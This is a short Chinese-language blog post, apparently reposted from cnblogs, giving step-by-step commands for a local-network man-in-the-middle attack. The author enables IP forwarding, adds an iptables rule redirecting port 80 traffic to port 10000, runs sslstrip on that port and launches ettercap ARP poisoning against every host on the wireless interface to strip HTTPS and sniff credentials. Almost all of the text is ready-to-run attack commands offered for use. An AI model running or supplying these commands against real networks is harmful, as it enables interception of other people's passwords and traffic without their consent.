Ettercap结合sslstrip对ssl/https进行攻击

   

        Ettercap是一个非常强大的嗅探欺骗工具;在以往的ettercap的使用过程中,我们大多用来嗅探http,ftp,和一些加密比较简单的邮箱等的密码,对于新型的ssl/https等的加密协议就显得不是太完美;这里我们使用一款专门针对ssl/https加密协议的工具配合Ettercap进行局域网嗅探欺骗:sslstrip。

       以下方法均来自互联网,这里只是记录一下笔者自己使用过程!

 

1.开启转发:

echo "1">/proc/sys/net/ipv4/ip_forward

2.iptables过滤数据包

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

还有一种方式:修改/etc/ettercap/etter.conf

去掉# if you use iptables:

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

的两个注释即可

3.监听转发端口

sslstrip -l 10000 

4.arp嗅探

ettercap -T -q -i wlan0 -M arp:remote // //

 

   

   

   

视频:

清晰版下载地址:http://pan.baidu.com/s/1qWJbFrA

原文地址:https://www.cnblogs.com/h4ck0ne/p/5154688.html